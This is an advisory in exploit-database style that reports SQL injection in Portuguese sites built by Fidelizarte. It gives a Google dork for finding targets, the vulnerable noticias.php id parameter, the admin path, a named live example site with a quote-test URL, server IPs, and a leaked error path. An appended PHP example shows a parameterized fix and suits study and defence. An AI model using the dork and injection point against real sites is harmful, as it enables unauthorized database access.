
Desenvolvido por Fidelizarte Web Design Portugal SQL Injection

Author: KingSkrupellos , Published: 18-01-2019
####################################################################

# Exploit Title : Desenvolvido por Fidelizarte Web Design Portugal SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 15/01/2019
# Vendor Homepage : fidelizarte.pt
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Desenvolvido por Fidelizarte'' site:pt
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

####################################################################

# Admin Panel Login Path :
*************************
/admin/

# SQL Injection Exploit :
***********************

/noticias.php?id=[SQL Injection]

###################################################################

# Example Vulnerable Site :
*************************

[+] jetexpress.pt/noticias.php?id=2%27 =>

[ Proof of Concept ] => archive.is/ysmky

Note : (185.15.22.176) => There are 112 domains hosted on this server.

Note : (185.15.22.148) => There are 36 domains hosted on this server.

####################################################################

# SQL Database Error :
**********************

Fatal error: Call to a member function fetchAll() on a non-object in /home/jetexpre/public_html/noticias.php on line 139
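
Added example (not part of the original advisory and not the vendor's code): the error above is consistent with a query built by concatenating `id`, whose failed result is then used without a check. The code shows that assumed pattern beside a validated, parameterized lookup. The table and column names, the PDO/SQLite setup (requires the pdo_sqlite extension) and both function names are assumptions.

```php
<?php
// Constructed demo data: in-memory SQLite stands in for the site's database.
// Table/column names (noticias, id, titulo) and function names are assumptions.
$pdo = new PDO('sqlite::memory:');
$pdo->exec("CREATE TABLE noticias (id INTEGER PRIMARY KEY, titulo TEXT)");
$pdo->exec("INSERT INTO noticias (id, titulo) VALUES (1, 'Primeira'), (2, 'Segunda')");

// Assumed 'before' pattern: the id parameter is concatenated into the SQL text.
function lookup_concatenated(PDO $pdo, string $id) {
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_SILENT); // pre-PHP 8 default
    $stmt = $pdo->query("SELECT id, titulo FROM noticias WHERE id = " . $id);
    // On a syntax error query() returns false; calling ->fetchAll() on that
    // value is what produces "fetchAll() on a non-object". Checked here instead.
    return $stmt === false ? false : $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened form: strict integer validation, then a bound parameter.
function lookup_hardened(PDO $pdo, string $id): array {
    $n = filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($n === false) {
        return []; // non-numeric id never reaches the database; answer 404
    }
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    try {
        $stmt = $pdo->prepare('SELECT id, titulo FROM noticias WHERE id = :id');
        $stmt->bindValue(':id', $n, PDO::PARAM_INT);
        $stmt->execute();
        return $stmt->fetchAll(PDO::FETCH_ASSOC);
    } catch (PDOException $e) {
        // Log server-side only; with display_errors off the visitor never
        // sees file paths or line numbers like the ones quoted above.
        error_log('noticias lookup failed: ' . $e->getMessage());
        return [];
    }
}

// "2'" is the decoded id=2%27 value from the request shown in the advisory.
foreach (['2', "2'"] as $id) {
    $before = lookup_concatenated($pdo, $id);
    $after  = lookup_hardened($pdo, $id);
    printf("id=%-3s concatenated=%s hardened=%d row(s)\n", $id,
        $before === false ? 'query failed' : count($before) . ' row(s)',
        count($after));
}
```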

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################
